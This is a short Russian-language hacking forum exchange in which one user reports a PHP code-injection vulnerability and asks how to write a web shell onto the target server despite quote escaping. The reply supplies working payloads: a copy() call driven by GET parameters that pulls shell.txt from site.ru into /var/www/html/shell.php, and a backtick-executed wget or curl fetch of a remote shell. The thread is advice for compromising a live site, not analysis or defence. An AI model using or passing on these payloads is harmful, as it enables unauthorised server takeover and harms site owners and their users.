09.01.2012, 00:47
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от ocheretko
Нашел уязвимость, отсылаю пост запрос с содержимым:
$modi=
все выводится. Но когда пытаюсь отослать запрос с кавычкой, получаю ошибку:
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /h
Подскажите в какую сторону копать, чтобы залить шелл. Например вот так:
file_put_contents($_SERVER[DOCUMENT_ROOT].DIRECTORY_SEPARATOR.'1.php','111';
только как избавится от кавычек?
copy($_GET[a],$_GET );
через гет отправь
a=http://site.ru/shell.txt&b=/var/www/html/shell.php
если shell_exec не отключено, то можно и print(`wget http://site.ru/shell.php`); или curl
|
|
|